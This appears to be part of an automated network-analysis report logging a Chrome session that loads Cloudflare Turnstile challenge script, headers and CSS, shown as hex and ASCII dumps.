                                                                    2024-05-24 03:02:00 UTC1369INData Raw: 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 72 2e 70 75 73 68 2e 61 70 70 6c 79 28 72 2c 6f 29 7d 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 54 74 28 65 2c 61 29 7b 72 65 74 75 72 6e 20 61 3d 61 21 3d 6e 75 6c 6c 3f 61 3a 7b 7d 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 61 29 29 3a 64 72 28 4f 62 6a 65 63 74 28 61 29 29 2e 66 6f 72 45 61 63 68
                                                                    Data Ascii: r(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),r.push.apply(r,o)}return r}function Tt(e,a){return a=a!=null?a:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(a)):dr(Object(a)).forEach
                                                                    2024-05-24 03:02:00 UTC1369INData Raw: 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 43 65 28 65 2c 61 29 7b 76 61 72 20 72 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30 5d 26 31 29 74 68 72 6f 77 20 75 5b 31 5d 3b 72 65 74 75 72 6e 20 75 5b 31 5d 7d 2c 74 72 79 73 3a 5b 5d 2c 6f 70 73 3a 5b 5d 7d 2c 6f 2c 63 2c 75 2c 67 3b 72 65 74 75 72 6e 20 67 3d 7b 6e 65 78 74 3a 62 28 30 29 2c 74 68 72 6f 77 3a 62 28 31 29 2c 72 65 74 75 72 6e 3a 62 28 32 29 7d 2c 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 28 67
                                                                    Data Ascii: urn e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ce(e,a){var r={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={next:b(0),throw:b(1),return:b(2)},typeof Symbol=="function"&&(g
                                                                    2024-05-24 03:02:00 UTC1369INData Raw: 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 43 74 3d 33 30 30 30 32 30 3b 76 61 72 20 4e 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4d 41 4e 41 47 45 44 3d 22 6d 61 6e 61 67 65 64 22 2c 65 2e 4e 4f 4e 5f 49 4e 54 45 52 41 43 54 49 56 45 3d 22 6e 6f 6e 2d 69 6e 74 65 72 61 63 74 69 76 65 22 2c 65 2e 49 4e 56 49 53 49 42 4c 45 3d 22 69 6e 76 69 73 69 62 6c 65 22 7d 29 28 55 7c 7c 28 55 3d 7b 7d 29 29 3b 76 61 72 20 56 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 4f 52 4d 41 4c 3d 22 6e 6f 72 6d 61 6c 22
                                                                    Data Ascii: ked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Ct=300020;var Ne=300030;var U;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(U||(U={}));var V;(function(e){e.NORMAL="normal"
                                                                    2024-05-24 03:02:00 UTC1369INData Raw: 74 72 69 6e 67 22 26 26 76 72 2e 74 65 73 74 28 65 29 7d 76 61 72 20 6d 72 3d 2f 5e 5b 61 2d 7a 30 2d 39 5f 5c 2d 3d 5d 7b 30 2c 32 35 35 7d 24 2f 69 3b 66 75 6e 63 74 69 6f 6e 20 5a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 76 6f 69 64 20 30 3f 21 30 3a 74 79 70 65 6f 66 20 65 3d 3d 22 73 74 72 69 6e 67 22 26 26 6d 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 65 74 28 65 29 7b 72 65 74 75 72 6e 20 4e 28 5b 22 6e 6f 72 6d 61 6c 22 2c 22 63 6f 6d 70 61 63 74 22 2c 22 69 6e 76 69 73 69 62 6c 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 74 74 28 65 29 7b 72 65 74 75 72 6e 20 4e 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 72 74 28 65 29 7b 72 65 74 75 72 6e 20 4e 28
                                                                    Data Ascii: tring"&&vr.test(e)}var mr=/^[a-z0-9_\-=]{0,255}$/i;function Ze(e){return e===void 0?!0:typeof e=="string"&&mr.test(e)}function et(e){return N(["normal","compact","invisible"],e)}function tt(e){return N(["auto","manual","never"],e)}function rt(e){return N(
                                                                    2024-05-24 03:02:00 UTC1369INData Raw: 74 75 72 6e 73 74 69 6c 65 2f 69 66 2f 6f 76 32 2f 61 76 30 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 61 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2e 73 69 7a 65 29 2e 63 6f 6e 63 61 74 28 73 29 7d 66 75 6e 63 74 69 6f 6e 20 4c 65 28 65 29 7b 69 66 28 65 3d 3d 3d 76 6f 69 64 20 30 29 74 68 72 6f 77 20 6e 65 77 20 52 65 66 65 72 65 6e 63 65 45 72 72 6f 72 28 22 74 68 69 73 20 68 61 73 6e 27 74 20 62 65 65 6e 20 69 6e 69 74 69 61 6c 69 73 65 64 20 2d 20 73 75 70 65 72 28 29 20 68 61 73 6e 27 74 20 62 65 65 6e 20 63 61 6c 6c 65 64 22 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 71 74 28 65 2c 61 29 7b
                                                                    Data Ascii: turnstile/if/ov2/av0/rcv").concat(o,"/").concat(e,"/").concat(a,"/").concat(r.theme,"/").concat(r.size).concat(s)}function Le(e){if(e===void 0)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return e}function qt(e,a){
                                                                    2024-05-24 03:02:00 UTC1369INData Raw: 69 6f 6e 28 6f 29 7b 69 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 47 74 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 69 66 28 74 79 70 65 6f 66 20 61 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 7b 69 66 28 61 2e 68 61 73 28 6f 29 29 72 65 74 75 72 6e 20 61 2e 67 65 74 28 6f 29 3b 61 2e 73 65 74 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 72 65 74 75 72 6e 20 62 65 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 74 65 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29
                                                                    Data Ascii: ion(o){if(o===null||!Gt(o))return o;if(typeof o!="function")throw new TypeError("Super expression must either be null or a function");if(typeof a!="undefined"){if(a.has(o))return a.get(o);a.set(o,c)}function c(){return be(o,arguments,te(this).constructor)
                                                                    2024-05-24 03:02:00 UTC1369INData Raw: 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34 33 37 37 37 29 3b 76 61 72 20 61 3d 7b 6c 6f 61 64 65 64 41 73 79 6e 63 3a 21 31 2c 70 61 72 61 6d 73 3a 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 7d 3b 28 65 2e 61 73 79 6e 63 7c 7c 65 2e 64 65 66 65 72 29 26 26 28 61 2e 6c 6f 61 64 65 64 41 73 79 6e 63 3d 21 30 29 3b 76 61 72 20 72 3d 65 2e 73 72 63 2c 6f 3d 72 2e 73 70 6c 69 74 28 22 3f 22 29 3b 72 65 74 75 72 6e 20 6f 2e 6c 65 6e 67 74 68 3e 31 26 26 28 61 2e 70 61 72 61 6d 73 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 6f 5b 31 5d 29 29 2c 61 7d 66 75 6e 63 74 69 6f 6e 20 44 28 29 7b 72 65 74
                                                                    Data Ascii: Turnstile script tag, some features may not be available",43777);var a={loadedAsync:!1,params:new URLSearchParams};(e.async||e.defer)&&(a.loadedAsync=!0);var r=e.src,o=r.split("?");return o.length>1&&(a.params=new URLSearchParams(o[1])),a}function D(){ret
                                                                    2024-05-24 03:02:00 UTC1369INData Raw: 22 2c 68 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 61 62 73 6f 6c 75 74 65 22 2c 68 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 32 30 22 2c 68 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 57 69 64 74 68 3d 22 31 70 78 22 2c 68 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 43 6f 6c 6f 72 3d 22 23 30 30 30 22 2c 68 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 53 74 79 6c 65 3d 22 73 6f 6c 69 64 22 2c 68 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 2c 68 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 52 61 64 69 75 73 3d 22 31 30 70 78 22 2c 68 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 2d 31 32 32 70 78 22 2c 68 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 2d 39 31 70 78 22 2c 68 2e 73 74 79 6c 65 2e 6f 76 65
                                                                    Data Ascii: ",h.style.position="absolute",h.style.zIndex="21474836420",h.style.borderWidth="1px",h.style.borderColor="#000",h.style.borderStyle="solid",h.style.backgroundColor="#ffffff",h.style.borderRadius="10px",h.style.left="-122px",h.style.top="-91px",h.style.ove
                                                                    2024-05-24 03:02:00 UTC1369INData Raw: 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 74 72 6f 6b 65 2d 77 69 64 74 68 22 2c 22 33 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 74 72 6f 6b 65 22 2c 22 23 66 66 66 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 66 69 6c 6c 22 2c 22 6e 6f 6e 65 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 78 31 22 2c 22 36 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 78 32 22 2c 22 31 38 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 79 31 22 2c 22 31 38 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 79 32 22 2c 22 35 22 29 2c 6e 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 3b 76 61 72 20 66 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 4e 53 28 22 68 74 74 70 3a 2f 2f 77
                                                                    Data Ascii: .setAttribute("stroke-width","3"),t.setAttribute("stroke","#fff"),t.setAttribute("fill","none"),t.setAttribute("x1","6"),t.setAttribute("x2","18"),t.setAttribute("y1","18"),t.setAttribute("y2","5"),n.appendChild(t);var f=document.createElementNS("http://w


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    9192.168.2.1649724104.17.2.1844432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-24 03:02:01 UTC789OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/cr37t/0x4AAAAAAAXRTsOVR7YNTKTk/auto/normal HTTP/1.1
                                                                    Host: challenges.cloudflare.com
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Upgrade-Insecure-Requests: 1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: navigate
                                                                    Sec-Fetch-Dest: iframe
                                                                    Referer: https://ztyw.kensteg.com/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-05-24 03:02:01 UTC1362INHTTP/1.1 200 OK
                                                                    Date: Fri, 24 May 2024 03:02:01 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 79406
                                                                    Connection: close
                                                                    content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                    cross-origin-embedder-policy: require-corp
                                                                    cross-origin-resource-policy: cross-origin
                                                                    critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                    document-policy: js-profiling
                                                                    origin-agent-cluster: ?1
                                                                    cross-origin-opener-policy: same-origin
                                                                    referrer-policy: same-origin
                                                                    accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                    permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                    2024-05-24 03:02:01 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 38 38 61 30 62 36 33 30 65 64 39 38 63 31 62 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                    Data Ascii: Server: cloudflareCF-RAY: 888a0b630ed98c1b-EWRalt-svc: h3=":443"; ma=86400
                                                                    2024-05-24 03:02:01 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                    2024-05-24 03:02:01 UTC1369INData Raw: 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 7d 0a 0a 62 6f 64 79 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 37 70 78 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30 3b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 20
                                                                    Data Ascii: 00%; height: 100%; overflow: hidden;}body { margin: 0; background-color: #fff; padding: 0; width: 100%; height: 100%; overflow: hidden; line-height: 17px; color: #1d1f20; font-family: -apple-system, system-ui, blinkmacsystemfont,
                                                                    2024-05-24 03:02:01 UTC1369INData Raw: 6d 69 74 65 72 6c 69 6d 69 74 3a 20 31 30 3b 0a 7d 0a 0a 23 73 75 63 63 65 73 73 2d 69 63 6f 6e 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 38 70 78 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 69 6e 73 65 74 20 30 20 30 20 30 20 23 30 33 38 31 32 37 3b 0a 20 20 77 69 64 74 68 3a 20 33 30 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 33 30 70 78 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 2d 75 70 2d 63 65 6e 74 65 72 20 30 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 35 35 2c 20 30 2e 30 38 35 2c 20 30 2e 36 38 2c 20 30 2e 35 33 29 20 62 6f 74 68 3b 0a 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 20
                                                                    Data Ascii: miterlimit: 10;}#success-icon { display: flex; margin-right: 8px; border-radius: 50%; box-shadow: inset 0 0 0 #038127; width: 30px; height: 30px; animation: scale-up-center 0.6s cubic-bezier(0.55, 0.085, 0.68, 0.53) both; stroke-width:
                                                                    2024-05-24 03:02:01 UTC1369INData Raw: 61 3a 66 6f 63 75 73 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 39 34 39 34 39 34 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 62 2d 6c 62 20 2e 63 62 2d 69 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 32 32 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b
                                                                    Data Ascii: a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus { color: #949494;}.theme-dark .cb-lb .cb-i { border: 2px solid #dadada; background-color: #222;}.theme-dark
                                                                    2024-05-24 03:02:01 UTC1369INData Raw: 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 32 32 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 71 72 20 7b 0a 20 20 66 69 6c 6c 3a 20 72 67 62 28 32 34 33 2c 20 31 32 38 2c 20 33 32 29 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 20 7b 0a 20 20 66 69 6c 6c 3a 20 23 66 66 66 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 62 62 62 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 2c
                                                                    Data Ascii: border-color: #666; background-color: #222;}.theme-dark #qr { fill: rgb(243, 128, 32);}.theme-dark .logo-text { fill: #fff;}.theme-dark #fr-helper-link,.theme-dark #fr-helper-loop-link { color: #bbb;}.theme-dark #fr-helper-link:visited,
                                                                    2024-05-24 03:02:01 UTC1369INData Raw: 63 6f 6c 6f 72 3a 20 23 66 61 66 61 66 61 3b 0a 7d 0a 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 30 70 78 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 64 65 31 33 30 33 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 39 70 78 3b 0a 7d 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30 3b 0a 7d 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 2c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76
                                                                    Data Ascii: color: #fafafa;}#challenge-overlay,#challenge-error-text { text-align: center; line-height: 10px; color: #de1303; font-size: 9px;}#challenge-overlay a,#challenge-error-text a { color: #1d1f20;}#challenge-overlay a:visited, #challenge-ov
                                                                    2024-05-24 03:02:01 UTC1369INData Raw: 74 3a 61 63 74 69 76 65 20 7e 20 73 70 61 6e 2e 63 62 2d 6c 62 2d 74 20 7b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 7d 0a 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 2e 63 62 2d 69 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 63 34 34 64 30 65 3b 0a 7d 0a 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 73 70 61 6e 2e 63 62 2d 6c 62 2d 74 20 7b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 7d 0a 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 20 7e 20 2e 63 62 2d 69 20 7b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 20 73 63 61 6c 65 28 31 29 3b 0a 20 20
                                                                    Data Ascii: t:active ~ span.cb-lb-t { text-decoration: underline;}.cb-lb input:focus ~ .cb-i { border: 2px solid #c44d0e;}.cb-lb input:focus ~ span.cb-lb-t { text-decoration: underline;}.cb-lb input:checked ~ .cb-i { transform: rotate(0deg) scale(1);
                                                                    2024-05-24 03:02:01 UTC1369INData Raw: 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 66 6c 65 78 2d 66 6c 6f 77 3a 20 72 6f 77 2d 72 65 76 65 72 73 65 20 77 72 61 70 3b 0a 20 20 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 20 66 6c 65 78 2d 73 74 61 72 74 3b 0a 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 20 31 36 70 78 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67
                                                                    Data Ascii: .size-compact .cb-container { margin-top: 3px; margin-left: 0;}.size-compact #branding { display: flex; flex-flow: row-reverse wrap; place-content: center flex-start; align-items: center; margin: 5px 16px 0; padding-right: 0; text-alig
